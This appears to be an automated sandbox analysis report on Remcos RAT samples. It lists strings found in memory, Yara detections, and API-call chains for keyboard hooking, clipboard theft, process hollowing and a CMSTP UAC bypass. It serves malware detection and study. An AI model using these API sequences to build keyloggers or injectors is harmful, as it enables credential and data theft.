                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: DGlxtFUfY.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://www.office.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000008_2_0040A2F3
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168FC
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_0040987A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_00406E9F
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A41B
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CA6D SystemParametersInfoW,8_2_0041CA6D
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CA73 SystemParametersInfoW,8_2_0041CA73

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167EF
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_00F8D63C0_2_00F8D63C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059BC9D00_2_059BC9D0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B74180_2_059B7418
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B74280_2_059B7428
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B47E70_2_059B47E7
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B67300_2_059B6730
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B67200_2_059B6720
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B62F80_2_059B62F8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B62E80_2_059B62E8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B5EB20_2_059B5EB2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B5EC00_2_059B5EC0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_059B48180_2_059B4818
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3D7080_2_07A3D708
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3DCFE0_2_07A3DCFE
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3DC280_2_07A3DC28
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3AA600_2_07A3AA60
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3A7B80_2_07A3A7B8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3A7C80_2_07A3A7C8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3D6FB0_2_07A3D6FB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_07A3DC1B0_2_07A3DC1B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043706A8_2_0043706A
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004140058_2_00414005
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043E11C8_2_0043E11C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004541D98_2_004541D9
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004381E88_2_004381E8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041F18B8_2_0041F18B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004462708_2_00446270
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043E34B8_2_0043E34B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004533AB8_2_004533AB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0042742E8_2_0042742E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004375668_2_00437566
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043E5A88_2_0043E5A8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004387F08_2_004387F0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043797E8_2_0043797E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004339D78_2_004339D7
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0044DA498_2_0044DA49
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00427AD78_2_00427AD7
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041DBF38_2_0041DBF3
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00427C408_2_00427C40
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00437DB38_2_00437DB3
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00435EEB8_2_00435EEB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043DEED8_2_0043DEED
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00426E9F8_2_00426E9F
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_00D0D63C10_2_00D0D63C
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4D70810_2_06C4D708
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4DCFE10_2_06C4DCFE
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4DC2810_2_06C4DC28
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4AA6010_2_06C4AA60
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4D6FA10_2_06C4D6FA
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4A7C810_2_06C4A7C8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4A7B810_2_06C4A7B8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06C4DC1A10_2_06C4DC1A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DDBC5010_2_06DDBC50
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD5EC010_2_06DD5EC0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD5EB110_2_06DD5EB1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD673010_2_06DD6730
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD672010_2_06DD6720
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD741810_2_06DD7418
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD742810_2_06DD7428
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD62F810_2_06DD62F8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD62E810_2_06DD62E8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD481810_2_06DD4818
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_1001719414_2_10017194
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_1000B5C114_2_1000B5C1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044B04016_2_0044B040
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0043610D16_2_0043610D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044731016_2_00447310
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044A49016_2_0044A490
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040755A16_2_0040755A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0043C56016_2_0043C560
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044B61016_2_0044B610
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044D6C016_2_0044D6C0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_004476F016_2_004476F0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044B87016_2_0044B870
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044081D16_2_0044081D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0041495716_2_00414957
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_004079EE16_2_004079EE
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00407AEB16_2_00407AEB
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044AA8016_2_0044AA80
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00412AA916_2_00412AA9
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00404B7416_2_00404B74
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00404B0316_2_00404B03
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044BBD816_2_0044BBD8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00404BE516_2_00404BE5
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00404C7616_2_00404C76
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00415CFE16_2_00415CFE
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00416D7216_2_00416D72
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00446D3016_2_00446D30
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00446D8B16_2_00446D8B
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00406E8F16_2_00406E8F
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0040503817_2_00405038
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0041208C17_2_0041208C
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004050A917_2_004050A9
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0040511A17_2_0040511A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0043C13A17_2_0043C13A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004051AB17_2_004051AB
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044930017_2_00449300
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0040D32217_2_0040D322
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044A4F017_2_0044A4F0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0041363117_2_00413631
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044669017_2_00446690
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044A73017_2_0044A730
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004398D817_2_004398D8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_004498E017_2_004498E0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044A88617_2_0044A886
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0043DA0917_2_0043DA09
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00438D5E17_2_00438D5E
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00449ED017_2_00449ED0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0041FE8317_2_0041FE83
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00430F5417_2_00430F54
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00402093 appears 50 times
